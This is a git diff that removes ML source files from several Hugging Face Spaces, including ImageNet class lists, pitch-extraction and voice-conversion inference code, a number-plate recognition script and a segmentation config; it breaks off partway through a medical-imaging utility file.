-SIMPLE_IMAGENET_TEMPLATES = ( - lambda c: f'itap of a {c}.', - lambda c: f'a bad photo of the {c}.', - lambda c: f'a origami {c}.', - lambda c: f'a photo of the large {c}.', - lambda c: f'a {c} in a video game.', - lambda c: f'art of the {c}.', - lambda c: f'a photo of the small {c}.', -) - - -IMAGENET_CLASSNAMES = ( - "tench", "goldfish", "great white shark", "tiger shark", "hammerhead shark", "electric ray", - "stingray", "rooster", "hen", "ostrich", "brambling", "goldfinch", "house finch", "junco", - "indigo bunting", "American robin", "bulbul", "jay", "magpie", "chickadee", "American dipper", - "kite (bird of prey)", "bald eagle", "vulture", "great grey owl", "fire salamander", - "smooth newt", "newt", "spotted salamander", "axolotl", "American bullfrog", "tree frog", - "tailed frog", "loggerhead sea turtle", "leatherback sea turtle", "mud turtle", "terrapin", - "box turtle", "banded gecko", "green iguana", "Carolina anole", - "desert grassland whiptail lizard", "agama", "frilled-necked lizard", "alligator lizard", - "Gila monster", "European green lizard", "chameleon", "Komodo dragon", "Nile crocodile", - "American alligator", "triceratops", "worm snake", "ring-necked snake", - "eastern hog-nosed snake", "smooth green snake", "kingsnake", "garter snake", "water snake", - "vine snake", "night snake", "boa constrictor", "African rock python", "Indian cobra", - "green mamba", "sea snake", "Saharan horned viper", "eastern diamondback rattlesnake", - "sidewinder rattlesnake", "trilobite", "harvestman", "scorpion", "yellow garden spider", - "barn spider", "European garden spider", "southern black widow", "tarantula", "wolf spider", - "tick", "centipede", "black grouse", "ptarmigan", "ruffed grouse", "prairie grouse", "peafowl", - "quail", "partridge", "african grey parrot", "macaw", "sulphur-crested cockatoo", "lorikeet", - "coucal", "bee eater", "hornbill", "hummingbird", "jacamar", "toucan", "duck", - "red-breasted merganser", "goose", "black swan", "tusker", "echidna", "platypus", "wallaby", - "koala", "wombat", "jellyfish", "sea anemone", "brain coral", "flatworm", "nematode", "conch", - "snail", "slug", "sea slug", "chiton", "chambered nautilus", "Dungeness crab", "rock crab", - "fiddler crab", "red king crab", "American lobster", "spiny lobster", "crayfish", "hermit crab", - "isopod", "white stork", "black stork", "spoonbill", "flamingo", "little blue heron", - "great egret", "bittern bird", "crane bird", "limpkin", "common gallinule", "American coot", - "bustard", "ruddy turnstone", "dunlin", "common redshank", "dowitcher", "oystercatcher", - "pelican", "king penguin", "albatross", "grey whale", "killer whale", "dugong", "sea lion", - "Chihuahua", "Japanese Chin", "Maltese", "Pekingese", "Shih Tzu", "King Charles Spaniel", - "Papillon", "toy terrier", "Rhodesian Ridgeback", "Afghan Hound", "Basset Hound", "Beagle", - "Bloodhound", "Bluetick Coonhound", "Black and Tan Coonhound", "Treeing Walker Coonhound", - "English foxhound", "Redbone Coonhound", "borzoi", "Irish Wolfhound", "Italian Greyhound", - "Whippet", "Ibizan Hound", "Norwegian Elkhound", "Otterhound", "Saluki", "Scottish Deerhound", - "Weimaraner", "Staffordshire Bull Terrier", "American Staffordshire Terrier", - "Bedlington Terrier", "Border Terrier", "Kerry Blue Terrier", "Irish Terrier", - "Norfolk Terrier", "Norwich Terrier", "Yorkshire Terrier", "Wire Fox Terrier", - "Lakeland Terrier", "Sealyham Terrier", "Airedale Terrier", "Cairn Terrier", - "Australian Terrier", "Dandie Dinmont Terrier", "Boston Terrier", "Miniature Schnauzer", - "Giant Schnauzer", "Standard Schnauzer", "Scottish Terrier", "Tibetan Terrier", - "Australian Silky Terrier", "Soft-coated Wheaten Terrier", "West Highland White Terrier", - "Lhasa Apso", "Flat-Coated Retriever", "Curly-coated Retriever", "Golden Retriever", - "Labrador Retriever", "Chesapeake Bay Retriever", "German Shorthaired Pointer", "Vizsla", - "English Setter", "Irish Setter", "Gordon Setter", "Brittany dog", "Clumber Spaniel", - "English Springer Spaniel", "Welsh Springer Spaniel", "Cocker Spaniel", "Sussex Spaniel", - "Irish Water Spaniel", "Kuvasz", "Schipperke", "Groenendael dog", "Malinois", "Briard", - "Australian Kelpie", "Komondor", "Old English Sheepdog", "Shetland Sheepdog", "collie", - "Border Collie", "Bouvier des Flandres dog", "Rottweiler", "German Shepherd Dog", "Dobermann", - "Miniature Pinscher", "Greater Swiss Mountain Dog", "Bernese Mountain Dog", - "Appenzeller Sennenhund", "Entlebucher Sennenhund", "Boxer", "Bullmastiff", "Tibetan Mastiff", - "French Bulldog", "Great Dane", "St. Bernard", "husky", "Alaskan Malamute", "Siberian Husky", - "Dalmatian", "Affenpinscher", "Basenji", "pug", "Leonberger", "Newfoundland dog", - "Great Pyrenees dog", "Samoyed", "Pomeranian", "Chow Chow", "Keeshond", "brussels griffon", - "Pembroke Welsh Corgi", "Cardigan Welsh Corgi", "Toy Poodle", "Miniature Poodle", - "Standard Poodle", "Mexican hairless dog (xoloitzcuintli)", "grey wolf", "Alaskan tundra wolf", - "red wolf or maned wolf", "coyote", "dingo", "dhole", "African wild dog", "hyena", "red fox", - "kit fox", "Arctic fox", "grey fox", "tabby cat", "tiger cat", "Persian cat", "Siamese cat", - "Egyptian Mau", "cougar", "lynx", "leopard", "snow leopard", "jaguar", "lion", "tiger", - "cheetah", "brown bear", "American black bear", "polar bear", "sloth bear", "mongoose", - "meerkat", "tiger beetle", "ladybug", "ground beetle", "longhorn beetle", "leaf beetle", - "dung beetle", "rhinoceros beetle", "weevil", "fly", "bee", "ant", "grasshopper", - "cricket insect", "stick insect", "cockroach", "praying mantis", "cicada", "leafhopper", - "lacewing", "dragonfly", "damselfly", "red admiral butterfly", "ringlet butterfly", - "monarch butterfly", "small white butterfly", "sulphur butterfly", "gossamer-winged butterfly", - "starfish", "sea urchin", "sea cucumber", "cottontail rabbit", "hare", "Angora rabbit", - "hamster", "porcupine", "fox squirrel", "marmot", "beaver", "guinea pig", "common sorrel horse", - "zebra", "pig", "wild boar", "warthog", "hippopotamus", "ox", "water buffalo", "bison", - "ram (adult male sheep)", "bighorn sheep", "Alpine ibex", "hartebeest", "impala (antelope)", - "gazelle", "arabian camel", "llama", "weasel", "mink", "European polecat", - "black-footed ferret", "otter", "skunk", "badger", "armadillo", "three-toed sloth", "orangutan", - "gorilla", "chimpanzee", "gibbon", "siamang", "guenon", "patas monkey", "baboon", "macaque", - "langur", "black-and-white colobus", "proboscis monkey", "marmoset", "white-headed capuchin", - "howler monkey", "titi monkey", "Geoffroy's spider monkey", "common squirrel monkey", - "ring-tailed lemur", "indri", "Asian elephant", "African bush elephant", "red panda", - "giant panda", "snoek fish", "eel", "silver salmon", "rock beauty fish", "clownfish", - "sturgeon", "gar fish", "lionfish", "pufferfish", "abacus", "abaya", "academic gown", - "accordion", "acoustic guitar", "aircraft carrier", "airliner", "airship", "altar", "ambulance", - "amphibious vehicle", "analog clock", "apiary", "apron", "trash can", "assault rifle", - "backpack", "bakery", "balance beam", "balloon", "ballpoint pen", "Band-Aid", "banjo", - "baluster / handrail", "barbell", "barber chair", "barbershop", "barn", "barometer", "barrel", - "wheelbarrow", "baseball", "basketball", "bassinet", "bassoon", "swimming cap", "bath towel", - "bathtub", "station wagon", "lighthouse", "beaker", "military hat (bearskin or shako)", - "beer bottle", "beer glass", "bell tower", "baby bib", "tandem bicycle", "bikini", - "ring binder", "binoculars", "birdhouse", "boathouse", "bobsleigh", "bolo tie", "poke bonnet", - "bookcase", "bookstore", "bottle cap", "hunting bow", "bow tie", "brass memorial plaque", "bra", - "breakwater", "breastplate", "broom", "bucket", "buckle", "bulletproof vest", - "high-speed train", "butcher shop", "taxicab", "cauldron", "candle", "cannon", "canoe", - "can opener", "cardigan", "car mirror", "carousel", "tool kit", "cardboard box / carton", - "car wheel", "automated teller machine", "cassette", "cassette player", "castle", "catamaran", - "CD player", "cello", "mobile phone", "chain", "chain-link fence", "chain mail", "chainsaw", - "storage chest", "chiffonier", "bell or wind chime", "china cabinet", "Christmas stocking", - "church", "movie theater", "cleaver", "cliff dwelling", "cloak", "clogs", "cocktail shaker", - "coffee mug", "coffeemaker", "spiral or coil", "combination lock", "computer keyboard", - "candy store", "container ship", "convertible", "corkscrew", "cornet", "cowboy boot", - "cowboy hat", "cradle", "construction crane", "crash helmet", "crate", "infant bed", - "Crock Pot", "croquet ball", "crutch", "cuirass", "dam", "desk", "desktop computer", - "rotary dial telephone", "diaper", "digital clock", "digital watch", "dining table", - "dishcloth", "dishwasher", "disc brake", "dock", "dog sled", "dome", "doormat", "drilling rig", - "drum", "drumstick", "dumbbell", "Dutch oven", "electric fan", "electric guitar", - "electric locomotive", "entertainment center", "envelope", "espresso machine", "face powder", - "feather boa", "filing cabinet", "fireboat", "fire truck", "fire screen", "flagpole", "flute", - "folding chair", "football helmet", "forklift", "fountain", "fountain pen", "four-poster bed", - "freight car", "French horn", "frying pan", "fur coat", "garbage truck", - "gas mask or respirator", "gas pump", "goblet", "go-kart", "golf ball", "golf cart", "gondola", - "gong", "gown", "grand piano", "greenhouse", "radiator grille", "grocery store", "guillotine", - "hair clip", "hair spray", "half-track", "hammer", "hamper", "hair dryer", "hand-held computer", - "handkerchief", "hard disk drive", "harmonica", "harp", "combine harvester", "hatchet", - "holster", "home theater", "honeycomb", "hook", "hoop skirt", "gymnastic horizontal bar", - "horse-drawn vehicle", "hourglass", "iPod", "clothes iron", "carved pumpkin", "jeans", "jeep", - "T-shirt", "jigsaw puzzle", "rickshaw", "joystick", "kimono", "knee pad", "knot", "lab coat", - "ladle", "lampshade", "laptop computer", "lawn mower", "lens cap", "letter opener", "library", - "lifeboat", "lighter", "limousine", "ocean liner", "lipstick", "slip-on shoe", "lotion", - "music speaker", "loupe magnifying glass", "sawmill", "magnetic compass", "messenger bag", - "mailbox", "tights", "one-piece bathing suit", "manhole cover", "maraca", "marimba", "mask", - "matchstick", "maypole", "maze", "measuring cup", "medicine cabinet", "megalith", "microphone", - "microwave oven", "military uniform", "milk can", "minibus", "miniskirt", "minivan", "missile", - "mitten", "mixing bowl", "mobile home", "ford model t", "modem", "monastery", "monitor", - "moped", "mortar and pestle", "graduation cap", "mosque", "mosquito net", "vespa", - "mountain bike", "tent", "computer mouse", "mousetrap", "moving van", "muzzle", "metal nail", - "neck brace", "necklace", "baby pacifier", "notebook computer", "obelisk", "oboe", "ocarina", - "odometer", "oil filter", "pipe organ", "oscilloscope", "overskirt", "bullock cart", - "oxygen mask", "product packet / packaging", "paddle", "paddle wheel", "padlock", "paintbrush", - "pajamas", "palace", "pan flute", "paper towel", "parachute", "parallel bars", "park bench", - "parking meter", "railroad car", "patio", "payphone", "pedestal", "pencil case", - "pencil sharpener", "perfume", "Petri dish", "photocopier", "plectrum", "Pickelhaube", - "picket fence", "pickup truck", "pier", "piggy bank", "pill bottle", "pillow", "ping-pong ball", - "pinwheel", "pirate ship", "drink pitcher", "block plane", "planetarium", "plastic bag", - "plate rack", "farm plow", "plunger", "Polaroid camera", "pole", "police van", "poncho", - "pool table", "soda bottle", "plant pot", "potter's wheel", "power drill", "prayer rug", - "printer", "prison", "missile", "projector", "hockey puck", "punching bag", "purse", "quill", - "quilt", "race car", "racket", "radiator", "radio", "radio telescope", "rain barrel", - "recreational vehicle", "fishing casting reel", "reflex camera", "refrigerator", - "remote control", "restaurant", "revolver", "rifle", "rocking chair", "rotisserie", "eraser", - "rugby ball", "ruler measuring stick", "sneaker", "safe", "safety pin", "salt shaker", "sandal", - "sarong", "saxophone", "scabbard", "weighing scale", "school bus", "schooner", "scoreboard", - "CRT monitor", "screw", "screwdriver", "seat belt", "sewing machine", "shield", "shoe store", - "shoji screen / room divider", "shopping basket", "shopping cart", "shovel", "shower cap", - "shower curtain", "ski", "balaclava ski mask", "sleeping bag", "slide rule", "sliding door", - "slot machine", "snorkel", "snowmobile", "snowplow", "soap dispenser", "soccer ball", "sock", - "solar thermal collector", "sombrero", "soup bowl", "keyboard space bar", "space heater", - "space shuttle", "spatula", "motorboat", "spider web", "spindle", "sports car", "spotlight", - "stage", "steam locomotive", "through arch bridge", "steel drum", "stethoscope", "scarf", - "stone wall", "stopwatch", "stove", "strainer", "tram", "stretcher", "couch", "stupa", - "submarine", "suit", "sundial", "sunglasses", "sunglasses", "sunscreen", "suspension bridge", - "mop", "sweatshirt", "swim trunks / shorts", "swing", "electrical switch", "syringe", - "table lamp", "tank", "tape player", "teapot", "teddy bear", "television", "tennis ball", - "thatched roof", "front curtain", "thimble", "threshing machine", "throne", "tile roof", - "toaster", "tobacco shop", "toilet seat", "torch", "totem pole", "tow truck", "toy store", - "tractor", "semi-trailer truck", "tray", "trench coat", "tricycle", "trimaran", "tripod", - "triumphal arch", "trolleybus", "trombone", "hot tub", "turnstile", "typewriter keyboard", - "umbrella", "unicycle", "upright piano", "vacuum cleaner", "vase", "vaulted or arched ceiling", - "velvet fabric", "vending machine", "vestment", "viaduct", "violin", "volleyball", - "waffle iron", "wall clock", "wallet", "wardrobe", "military aircraft", "sink", - "washing machine", "water bottle", "water jug", "water tower", "whiskey jug", "whistle", - "hair wig", "window screen", "window shade", "Windsor tie", "wine bottle", "airplane wing", - "wok", "wooden spoon", "wool", "split-rail fence", "shipwreck", "sailboat", "yurt", "website", - "comic book", "crossword", "traffic or street sign", "traffic light", "dust jacket", "menu", - "plate", "guacamole", "consomme", "hot pot", "trifle", "ice cream", "popsicle", "baguette", - "bagel", "pretzel", "cheeseburger", "hot dog", "mashed potatoes", "cabbage", "broccoli", - "cauliflower", "zucchini", "spaghetti squash", "acorn squash", "butternut squash", "cucumber", - "artichoke", "bell pepper", "cardoon", "mushroom", "Granny Smith apple", "strawberry", "orange", - "lemon", "fig", "pineapple", "banana", "jackfruit", "cherimoya (custard apple)", "pomegranate", - "hay", "carbonara", "chocolate syrup", "dough", "meatloaf", "pizza", "pot pie", "burrito", - "red wine", "espresso", "tea cup", "eggnog", "mountain", "bubble", "cliff", "coral reef", - "geyser", "lakeshore", "promontory", "sandbar", "beach", "valley", "volcano", "baseball player", - "bridegroom", "scuba diver", "rapeseed", "daisy", "yellow lady's slipper", "corn", "acorn", - "rose hip", "horse chestnut seed", "coral fungus", "agaric", "gyromitra", "stinkhorn mushroom", - "earth star fungus", "hen of the woods mushroom", "bolete", "corn cob", "toilet paper" -) - diff --git a/spaces/LaynzKunz/Advanced-RVC-Inference/lib/infer_pack/modules/F0Predictor/HarvestF0Predictor.py b/spaces/LaynzKunz/Advanced-RVC-Inference/lib/infer_pack/modules/F0Predictor/HarvestF0Predictor.py deleted file mode 100644 index b412ba2814e114ca7bb00b6fd6ef217f63d788a3..0000000000000000000000000000000000000000 --- a/spaces/LaynzKunz/Advanced-RVC-Inference/lib/infer_pack/modules/F0Predictor/HarvestF0Predictor.py +++ /dev/null @@ -1,86 +0,0 @@ -from lib.infer_pack.modules.F0Predictor.F0Predictor import F0Predictor -import pyworld -import numpy as np - - -class HarvestF0Predictor(F0Predictor): - def __init__(self, hop_length=512, f0_min=50, f0_max=1100, sampling_rate=44100): - self.hop_length = hop_length - self.f0_min = f0_min - self.f0_max = f0_max - self.sampling_rate = sampling_rate - - def interpolate_f0(self, f0): - """ - 对F0进行插值处理 - """ - - data = np.reshape(f0, (f0.size, 1)) - - vuv_vector = np.zeros((data.size, 1), dtype=np.float32) - vuv_vector[data > 0.0] = 1.0 - vuv_vector[data <= 0.0] = 0.0 - - ip_data = data - - frame_number = data.size - last_value = 0.0 - for i in range(frame_number): - if data[i] <= 0.0: - j = i + 1 - for j in range(i + 1, frame_number): - if data[j] > 0.0: - break - if j < frame_number - 1: - if last_value > 0.0: - step = (data[j] - data[i - 1]) / float(j - i) - for k in range(i, j): - ip_data[k] = data[i - 1] + step * (k - i + 1) - else: - for k in range(i, j): - ip_data[k] = data[j] - else: - for k in range(i, frame_number): - ip_data[k] = last_value - else: - ip_data[i] = data[i] # 这里可能存在一个没有必要的拷贝 - last_value = data[i] - - return ip_data[:, 0], vuv_vector[:, 0] - - def resize_f0(self, x, target_len): - source = np.array(x) - source[source < 0.001] = np.nan - target = np.interp( - np.arange(0, len(source) * target_len, len(source)) / target_len, - np.arange(0, len(source)), - source, - ) - res = np.nan_to_num(target) - return res - - def compute_f0(self, wav, p_len=None): - if p_len is None: - p_len = wav.shape[0] // self.hop_length - f0, t = pyworld.harvest( - wav.astype(np.double), - fs=self.hop_length, - f0_ceil=self.f0_max, - f0_floor=self.f0_min, - frame_period=1000 * self.hop_length / self.sampling_rate, - ) - f0 = pyworld.stonemask(wav.astype(np.double), f0, t, self.fs) - return self.interpolate_f0(self.resize_f0(f0, p_len))[0] - - def compute_f0_uv(self, wav, p_len=None): - if p_len is None: - p_len = wav.shape[0] // self.hop_length - f0, t = pyworld.harvest( - wav.astype(np.double), - fs=self.sampling_rate, - f0_floor=self.f0_min, - f0_ceil=self.f0_max, - frame_period=1000 * self.hop_length / self.sampling_rate, - ) - f0 = pyworld.stonemask(wav.astype(np.double), f0, t, self.sampling_rate) - return self.interpolate_f0(self.resize_f0(f0, p_len)) diff --git a/spaces/Make-A-Protagonist/Make-A-Protagonist-inference/Make-A-Protagonist/experts/XMem/inference/interact/fbrs/inference/evaluation.py b/spaces/Make-A-Protagonist/Make-A-Protagonist-inference/Make-A-Protagonist/experts/XMem/inference/interact/fbrs/inference/evaluation.py deleted file mode 100644 index 6be3ed813eb257309f433ece0035e0890a82207e..0000000000000000000000000000000000000000 --- a/spaces/Make-A-Protagonist/Make-A-Protagonist-inference/Make-A-Protagonist/experts/XMem/inference/interact/fbrs/inference/evaluation.py +++ /dev/null @@ -1,56 +0,0 @@ -from time import time - -import numpy as np -import torch - -from ..inference import utils -from ..inference.clicker import Clicker - -try: - get_ipython() - from tqdm import tqdm_notebook as tqdm -except NameError: - from tqdm import tqdm - - -def evaluate_dataset(dataset, predictor, oracle_eval=False, **kwargs): - all_ious = [] - - start_time = time() - for index in tqdm(range(len(dataset)), leave=False): - sample = dataset.get_sample(index) - item = dataset[index] - - if oracle_eval: - gt_mask = torch.tensor(sample['instances_mask'], dtype=torch.float32) - gt_mask = gt_mask.unsqueeze(0).unsqueeze(0) - predictor.opt_functor.mask_loss.set_gt_mask(gt_mask) - _, sample_ious, _ = evaluate_sample(item['images'], sample['instances_mask'], predictor, **kwargs) - all_ious.append(sample_ious) - end_time = time() - elapsed_time = end_time - start_time - - return all_ious, elapsed_time - - -def evaluate_sample(image_nd, instances_mask, predictor, max_iou_thr, - pred_thr=0.49, max_clicks=20): - clicker = Clicker(gt_mask=instances_mask) - pred_mask = np.zeros_like(instances_mask) - ious_list = [] - - with torch.no_grad(): - predictor.set_input_image(image_nd) - - for click_number in range(max_clicks): - clicker.make_next_click(pred_mask) - pred_probs = predictor.get_prediction(clicker) - pred_mask = pred_probs > pred_thr - - iou = utils.get_iou(instances_mask, pred_mask) - ious_list.append(iou) - - if iou >= max_iou_thr: - break - - return clicker.clicks_list, np.array(ious_list, dtype=np.float32), pred_probs diff --git a/spaces/MarcusSu1216/XingTong/preprocess_flist_config.py b/spaces/MarcusSu1216/XingTong/preprocess_flist_config.py deleted file mode 100644 index 00535054a20fd81dcbbb4ac5f44e504a2bd2771d..0000000000000000000000000000000000000000 --- a/spaces/MarcusSu1216/XingTong/preprocess_flist_config.py +++ /dev/null @@ -1,75 +0,0 @@ -import os -import argparse -import re - -from tqdm import tqdm -from random import shuffle -import json -import wave - -config_template = json.load(open("configs_template/config_template.json")) - -pattern = re.compile(r'^[\.a-zA-Z0-9_\/]+$') - -def get_wav_duration(file_path): - with wave.open(file_path, 'rb') as wav_file: - # 获取音频帧数 - n_frames = wav_file.getnframes() - # 获取采样率 - framerate = wav_file.getframerate() - # 计算时长(秒) - duration = n_frames / float(framerate) - return duration - -if __name__ == "__main__": - parser = argparse.ArgumentParser() - parser.add_argument("--train_list", type=str, default="./filelists/train.txt", help="path to train list") - parser.add_argument("--val_list", type=str, default="./filelists/val.txt", help="path to val list") - parser.add_argument("--source_dir", type=str, default="./dataset/44k", help="path to source dir") - args = parser.parse_args() - - train = [] - val = [] - idx = 0 - spk_dict = {} - spk_id = 0 - for speaker in tqdm(os.listdir(args.source_dir)): - spk_dict[speaker] = spk_id - spk_id += 1 - wavs = ["/".join([args.source_dir, speaker, i]) for i in os.listdir(os.path.join(args.source_dir, speaker))] - new_wavs = [] - for file in wavs: - if not file.endswith("wav"): - continue - #if not pattern.match(file): - # print(f"warning:文件名{file}中包含非字母数字下划线,可能会导致错误。(也可能不会)") - if get_wav_duration(file) < 0.3: - print("skip too short audio:", file) - continue - new_wavs.append(file) - wavs = new_wavs - shuffle(wavs) - train += wavs[2:] - val += wavs[:2] - - shuffle(train) - shuffle(val) - - print("Writing", args.train_list) - with open(args.train_list, "w") as f: - for fname in tqdm(train): - wavpath = fname - f.write(wavpath + "\n") - - print("Writing", args.val_list) - with open(args.val_list, "w") as f: - for fname in tqdm(val): - wavpath = fname - f.write(wavpath + "\n") - - config_template["spk"] = spk_dict - config_template["model"]["n_speakers"] = spk_id - - print("Writing configs/config.json") - with open("configs/config.json", "w") as f: - json.dump(config_template, f, indent=2) diff --git a/spaces/MashiroSA/sovits-emu-voice-transform/inference/infer_tool_grad.py b/spaces/MashiroSA/sovits-emu-voice-transform/inference/infer_tool_grad.py deleted file mode 100644 index b75af49c08e2e724839828bc419792ed580809bb..0000000000000000000000000000000000000000 --- a/spaces/MashiroSA/sovits-emu-voice-transform/inference/infer_tool_grad.py +++ /dev/null @@ -1,160 +0,0 @@ -import hashlib -import json -import logging -import os -import time -from pathlib import Path -import io -import librosa -import maad -import numpy as np -from inference import slicer -import parselmouth -import soundfile -import torch -import torchaudio - -from hubert import hubert_model -import utils -from models import SynthesizerTrn -logging.getLogger('numba').setLevel(logging.WARNING) -logging.getLogger('matplotlib').setLevel(logging.WARNING) - -def resize2d_f0(x, target_len): - source = np.array(x) - source[source < 0.001] = np.nan - target = np.interp(np.arange(0, len(source) * target_len, len(source)) / target_len, np.arange(0, len(source)), - source) - res = np.nan_to_num(target) - return res - -def get_f0(x, p_len,f0_up_key=0): - - time_step = 160 / 16000 * 1000 - f0_min = 50 - f0_max = 1100 - f0_mel_min = 1127 * np.log(1 + f0_min / 700) - f0_mel_max = 1127 * np.log(1 + f0_max / 700) - - f0 = parselmouth.Sound(x, 16000).to_pitch_ac( - time_step=time_step / 1000, voicing_threshold=0.6, - pitch_floor=f0_min, pitch_ceiling=f0_max).selected_array['frequency'] - - pad_size=(p_len - len(f0) + 1) // 2 - if(pad_size>0 or p_len - len(f0) - pad_size>0): - f0 = np.pad(f0,[[pad_size,p_len - len(f0) - pad_size]], mode='constant') - - f0 *= pow(2, f0_up_key / 12) - f0_mel = 1127 * np.log(1 + f0 / 700) - f0_mel[f0_mel > 0] = (f0_mel[f0_mel > 0] - f0_mel_min) * 254 / (f0_mel_max - f0_mel_min) + 1 - f0_mel[f0_mel <= 1] = 1 - f0_mel[f0_mel > 255] = 255 - f0_coarse = np.rint(f0_mel).astype(np.int) - return f0_coarse, f0 - -def clean_pitch(input_pitch): - num_nan = np.sum(input_pitch == 1) - if num_nan / len(input_pitch) > 0.9: - input_pitch[input_pitch != 1] = 1 - return input_pitch - - -def plt_pitch(input_pitch): - input_pitch = input_pitch.astype(float) - input_pitch[input_pitch == 1] = np.nan - return input_pitch - - -def f0_to_pitch(ff): - f0_pitch = 69 + 12 * np.log2(ff / 440) - return f0_pitch - - -def fill_a_to_b(a, b): - if len(a) < len(b): - for _ in range(0, len(b) - len(a)): - a.append(a[0]) - - -def mkdir(paths: list): - for path in paths: - if not os.path.exists(path): - os.mkdir(path) - - -class VitsSvc(object): - def __init__(self): - self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu") - self.SVCVITS = None - self.hps = None - self.speakers = None - self.hubert_soft = utils.get_hubert_model() - - def set_device(self, device): - self.device = torch.device(device) - self.hubert_soft.to(self.device) - if self.SVCVITS != None: - self.SVCVITS.to(self.device) - - def loadCheckpoint(self, path): - self.hps = utils.get_hparams_from_file(f"checkpoints/{path}/config.json") - self.SVCVITS = SynthesizerTrn( - self.hps.data.filter_length // 2 + 1, - self.hps.train.segment_size // self.hps.data.hop_length, - **self.hps.model) - _ = utils.load_checkpoint(f"checkpoints/{path}/model.pth", self.SVCVITS, None) - _ = self.SVCVITS.eval().to(self.device) - self.speakers = self.hps.spk - - def get_units(self, source, sr): - source = source.unsqueeze(0).to(self.device) - with torch.inference_mode(): - units = self.hubert_soft.units(source) - return units - - - def get_unit_pitch(self, in_path, tran): - source, sr = torchaudio.load(in_path) - source = torchaudio.functional.resample(source, sr, 16000) - if len(source.shape) == 2 and source.shape[1] >= 2: - source = torch.mean(source, dim=0).unsqueeze(0) - soft = self.get_units(source, sr).squeeze(0).cpu().numpy() - f0_coarse, f0 = get_f0(source.cpu().numpy()[0], soft.shape[0]*2, tran) - return soft, f0 - - def infer(self, speaker_id, tran, raw_path): - speaker_id = self.speakers[speaker_id] - sid = torch.LongTensor([int(speaker_id)]).to(self.device).unsqueeze(0) - soft, pitch = self.get_unit_pitch(raw_path, tran) - f0 = torch.FloatTensor(clean_pitch(pitch)).unsqueeze(0).to(self.device) - stn_tst = torch.FloatTensor(soft) - with torch.no_grad(): - x_tst = stn_tst.unsqueeze(0).to(self.device) - x_tst = torch.repeat_interleave(x_tst, repeats=2, dim=1).transpose(1, 2) - audio = self.SVCVITS.infer(x_tst, f0=f0, g=sid)[0,0].data.float() - return audio, audio.shape[-1] - - def inference(self,srcaudio,chara,tran,slice_db): - sampling_rate, audio = srcaudio - audio = (audio / np.iinfo(audio.dtype).max).astype(np.float32) - if len(audio.shape) > 1: - audio = librosa.to_mono(audio.transpose(1, 0)) - if sampling_rate != 16000: - audio = librosa.resample(audio, orig_sr=sampling_rate, target_sr=16000) - soundfile.write("tmpwav.wav", audio, 16000, format="wav") - chunks = slicer.cut("tmpwav.wav", db_thresh=slice_db) - audio_data, audio_sr = slicer.chunks2audio("tmpwav.wav", chunks) - audio = [] - for (slice_tag, data) in audio_data: - length = int(np.ceil(len(data) / audio_sr * self.hps.data.sampling_rate)) - raw_path = io.BytesIO() - soundfile.write(raw_path, data, audio_sr, format="wav") - raw_path.seek(0) - if slice_tag: - _audio = np.zeros(length) - else: - out_audio, out_sr = self.infer(chara, tran, raw_path) - _audio = out_audio.cpu().numpy() - audio.extend(list(_audio)) - audio = (np.array(audio) * 32768.0).astype('int16') - return (self.hps.data.sampling_rate,audio) diff --git a/spaces/Mayanand/Automatic-Number-Plate-Recognition/main.py b/spaces/Mayanand/Automatic-Number-Plate-Recognition/main.py deleted file mode 100644 index 0696f3a906f8c746e53aace7fe56c7749996c960..0000000000000000000000000000000000000000 --- a/spaces/Mayanand/Automatic-Number-Plate-Recognition/main.py +++ /dev/null @@ -1,48 +0,0 @@ -from argparse import ArgumentParser -import os - -import cv2 -from detection import detect, read_image_with_resize, add_rect -from recognition import recognize, add_text - - -def extract_number_plate(image, box): - xmin, ymin, xmax, ymax = box - return image[ymin:ymax, xmin:xmax, :] - - -def read_number_plate(image): - orig_image = image - - boxes = detect(image) - - texts = [] - for box in boxes: - num_plate = extract_number_plate(orig_image, box) - text = recognize(num_plate) - texts.append(text) - return boxes, texts - - -if __name__ == "__main__": - parser = ArgumentParser() - parser.add_argument( - "--image", - default=None, - type=str, - help="path to image on which prediction will be made", - ) - - args = parser.parse_args() - - assert os.path.exists(args.image), f"given path {args.image} does not exists" - - im = read_image_with_resize(args.image) - - boxes, texts = read_number_plate(im) - print(texts) - for box, text in zip(boxes, texts): - im = add_rect(im, *box) - im = add_text(im, text, box) - - cv2.imwrite("result.jpg", im) diff --git a/spaces/Mellow-ai/PhotoAI_Mellow/annotator/uniformer/configs/_base_/schedules/schedule_20k.py b/spaces/Mellow-ai/PhotoAI_Mellow/annotator/uniformer/configs/_base_/schedules/schedule_20k.py deleted file mode 100644 index bf780a1b6f6521833c6a5859675147824efa599d..0000000000000000000000000000000000000000 --- a/spaces/Mellow-ai/PhotoAI_Mellow/annotator/uniformer/configs/_base_/schedules/schedule_20k.py +++ /dev/null @@ -1,9 +0,0 @@ -# optimizer -optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0005) -optimizer_config = dict() -# learning policy -lr_config = dict(policy='poly', power=0.9, min_lr=1e-4, by_epoch=False) -# runtime settings -runner = dict(type='IterBasedRunner', max_iters=20000) -checkpoint_config = dict(by_epoch=False, interval=2000) -evaluation = dict(interval=2000, metric='mIoU') diff --git a/spaces/MercurialAi/OncoMedleyMini/OncoMedley/GMIC/tools.py b/spaces/MercurialAi/OncoMedleyMini/OncoMedley/GMIC/tools.py deleted file mode 100644 index b86cd40bdec7dcbeda9cd228893e8c593243a38d..0000000000000000000000000000000000000000 --- a/spaces/MercurialAi/OncoMedleyMini/OncoMedley/GMIC/tools.py +++ /dev/null @@ -1,237 +0,0 @@ -""" -Defines utility functions for various tasks in GMIC. -""" -import numpy as np -import torch -from torch.autograd import Variable -import torch.nn.functional as F - -device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu') - -def partition_batch(ls, size): - """ - Partitions a list into buckets of given maximum length. - """ - i = 0 - partitioned_lists = [] - while i < len(ls): - partitioned_lists.append(ls[i: i+size]) - i += size - return partitioned_lists - - -def make_sure_in_range(val, min_val, max_val): - """ - Function that make sure that min < val < max; otherwise return the limit value - """ - if val < min_val: - return min_val - if val > max_val: - return max_val - return val - - -def crop(original_img, crop_shape, crop_position, method="center", - in_place=False, background_val="min"): - """ - Function that take a crop on the original image. - This function must staty in numpy since original_img should not be loaded into Pytorch during the network time. - original_img is large and would consume lots of GPU memory. - :param original_img: - :param crop_shape: - :param crop_position: - :param method: supported in ["center", "upper_left"] - :param in_place: if in_place, the effective pixels in the crop will be flagged (1.0) in the original_img - """ - # retrieve inputs - I, J = original_img.shape - crop_x, crop_y = crop_position - x_delta, y_delta = crop_shape - - # locate the four corners - if method == "center": - min_x = 